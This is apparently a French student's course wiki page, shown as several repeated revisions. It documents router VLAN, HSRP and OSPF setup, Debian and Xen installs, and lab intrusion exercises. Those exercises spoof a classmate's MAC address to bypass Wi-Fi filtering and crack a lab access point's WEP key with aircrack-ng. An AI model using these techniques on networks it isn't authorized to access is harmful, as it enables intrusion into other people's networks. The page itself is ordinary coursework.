apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre><br /> <br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=23083 TP sysres IMA2a5 2015/2016 G6 2015-11-20T08:34:02Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <pre><br /> code :<br /> airmon -ng start wlan1 ==> cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin<br /> soltion : apt-get install firmware-ralink<br /> <br /> <br /> Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0<br /> <br /> Je ré-ouvre une mon0.<br /> <br /> J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.<br /> <br /> Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.<br /> <br /> Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)<br /> <br /> code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.<br /> <br /> Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier<br /> <br /> <br /> Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! <br /> <br /> <br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22955 TP sysres IMA2a5 2015/2016 G6 2015-11-13T16:23:44Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. <br /> <br /> RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. <br /> <br /> SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1<br /> <br /> <pre><br /> Avec une simple ligne de code : je change mon adresse MAC !<br /> - ifconfig wlan0 down<br /> - ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br /> - ifconfig wlan0 up<br /> </pre><br /> <br /> MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.<br /> <br /> <br /> <h3>Cassage de clef WEP d'un point d'accès Wifi</h3><br /> <br /> <h3>Cassage de mot de passe WPA-PSK par force brute</h3><br /> <br /> '''''<h2>Installation des systèmes d'exploitation</h2>'''''<br /> ----<br /> <br /> J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net<br /> <br /> <pre><br /> Code :<br /> xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen<br /> <br /> nano /etc/ssh/sshd_config allow root login (without password)->yes<br /> apt -get purge network-manager systemd<br /> init tab ==> 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0<br /> </pre><br /> <br /> <pre><br /> Hostname : Werewolf<br /> Distribution : jessie<br /> MAC Address : 00:16:3E:25:96:A7<br /> IP Address(es) : 193.48.57.18<br /> RSA Fingerprint : 4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e<br /> Root Password : Il ne serait plus secret sinon ;)<br /> </pre><br /> <br /> A RETENIR :<br /> <pre><br /> Pour ouvrir la machine : xl console Werewolf<br /> Pour la fermer : halt<br /> Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg<br /> </pre><br /> <br /> '''''<h2>Services Internet</h2>'''''<br /> ----<br /> <br /> Le nom de domaine que j'ai réservé est : hunt3r.lol<br /> <br /> '''''<h2>Réalisation</h2>'''''<br /> ----<br /> <br /> <h3> Installation de LINUX sur les nouveaux PC HP </h3><br /> J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]<br /> <br /> Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : <br /> <br /> <pre><br /> Code :<br /> root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb<br /> </pre><br /> <br /> <pre><br /> On va donc configurer le réseau nous-même.<br /> Adresse IP : 172.20.106.6<br /> Mask : 255.255.255.0<br /> Adresse passerelle : 172.20.106.254<br /> Adresse des serveurs de noms : 193.48.57.34<br /> Nom de machine : perche<br /> Domaine : deule.net<br /> <br /> Mot de passe pour superutilisateur : celui de d'habitude pour un root<br /> Nouvel utilisateur : pifou<br /> Mot de passe nouvel utilisateur : celui de d'habitude pour pifou<br /> <br /> Arrivée au partitionnement :<br /> <br /> J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. <br /> Nom du miroir de l'archive Debian : debian.polytech-lille.fr<br /> Mandataire HTTP : http://proxy.polytech-lille.fr:3128<br /> Logiciels à installer : Xfce, service SSH et utilitaies usuels du système (à valider à l'aider de la barre espace)<br /> </pre><br /> <br /> A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.<br /> <br /> Pour cela j'installe aircrack.<br /> <br /> <pre><br /> Code : <br /> apt-get install aircrack-ng<br /> </pre><br /> <br /> <pre><br /> Modification du fichier /etc/apt/sources.list : <br /> rajout de contrib non-free<br /> <br /> Modification du fichier /etc/network/interfaces : <br /> auto eth0<br /> iface eth0 inet static <br /> address 172.20.106.6<br /> netmask 255.255.255.0<br /> gateway 172.20.106.254<br /> <br /> Modification du fichier /etc/resolv.conf : <br /> nameserver 193.48.57.34<br /> </pre><br /> <br /> <pre><br /> Code : <br /> apt-get install firmware-linux-nonfree<br /> apt-get remove network-manager<br /> apt-get install broadcom-sta-dkms<br /> modprobe wl<br /> modprobe -r b44 b43 b43legacy ssb brcmsmac<br /> modprobe -r wl<br /> modprobe wl*dmseg<br /> dmseg<br /> ifconfig -a <br /> reboot<br /> </pre><br /> <br /> A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]<br /> <br /> <br /> <br /> </pre></div>

Ebourre https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&diff=22954 TP sysres IMA2a5 2015/2016 G6 2015-11-13T15:44:27Z

<p>Ebourre : </p> <hr /> <div><h1> Projet Systèmes&Réseaux IMA2A5 </h1><br /> ----<br /> <br /> Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. <br /><br /> <br /> Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.<br /> <br /><br /> <br /> '''''<h2> Architecture réseau </h2>'''''<br /> ----<br /> <br /> Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.<br /> <br /> La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.<br /> <center><br /> <table><br /> <tr><th>'''N° du VLAN'''</th><th>'''Nom'''</th><th>'''Adresse IP'''</th><th>'''Adresse Routeur 1'''</th><th>'''Adresse Passerelle'''</th></tr><br /> <tr><th>2</th><th>Puduc</th><th>172.20.100.0/24</th><th>172.20.100.252</th><th>172.20.100.254</th></tr><br /> <tr><th>3</th><th>Nounours</th><th>172.20.101.0/24</th><th>172.20.101.252</th><th>172.20.101.254</th></tr><br /> <tr><th>4</th><th>Jeuno</th><th>172.20.102.0/24</th><th>172.20.102.252</th><th>172.20.102.254</th></tr><br /> <tr><th>5</th><th>Relax</th><th>172.20.103.0/24</th><th>172.20.103.252</th><th>172.20.103.254</th></tr><br /> <tr><th>6</th><th>John</th><th>172.20.104.0/24</th><th>172.20.104.252</th><th>172.20.104.254</th></tr><br /> <tr><th>7</th><th>Loki</th><th>172.20.105.0/24</th><th>172.20.105.252</th><th>172.20.105.254</th></tr><br /> <tr><th>8</th><th>Papy</th><th>172.20.106.0/24</th><th>172.20.106.252</th><th>172.20.106.254</th></tr><br /> <tr><th>10</th><th>Hub</th><th>193.48.57.176/28</th><th>193.48.57.188</th><th>193.48.57.190</th></tr><br /> <tr><th>131</th><th>Interco</th><th>192.168.222.8/29</th><th>192.168.222.9</th><th>X</th></tr><br /> </table><br /> </center><br /> <br /> Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera "prise" par le routeur le plus prioritaire. <br /> <br /> <pre><br /> Code sous minicom pour réaliser l'adressage des VLan's: <br /> <br /> - en // passage en mode administrateur<br /> - conf t <br /> - int vlan2 //modification du vlan2<br /> - ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2<br /> - standby 1 ip 172.20.100.254 // adresse de passerelle<br /> - standby 1 preempt //Utilisation du protocole HSRP nécessaire à la redondance<br /> - standby 1 priority 110 // priorité pour la prise de l'adresse passerelle<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un nom à un VLAN: <br /> <br /> - conf t <br /> - vlan8<br /> - name Papy<br /> </pre><br /> <br /> <pre><br /> Code pour affecter un port (içi pour internet)<br /> <br /> - conf t <br /> - interface GigabitEthernet 0/47 // on agit sur ce port<br /> - Sitchport mode access<br /> - switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet<br /> - no shut<br /> </pre><br /> <br /> <pre><br /> Code pour l'échange automatique des tables de routages :<br /> <br /> - Switch(config)#router ospf 1<br /> -Switch(config-router)#log-adjacency-changes<br /> -Switch(config-router)#router-id 172.20.100.252<br /> -Switch(config-router)#log-adjacency-changes <br /> -Switch(config-router)#summary-address 172.20.96.0 255.255.240.0<br /> -Switch(config-router)#summary-address 193.48.57.176 255.255.255.240<br /> -Switch(config-router)#redistribute connected metric 20 subnets <br /> -Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2<br /> </pre><br /> <br /> Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.<br /> <br /> <br /> '''''<h2> Tests d'intrusion </h2>'''''<br /> ----<br /> <br /> <h3>Intrusion par changement d'adresse MAC</h3><br /> <br /> Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.<br /> En modifiant le fichier 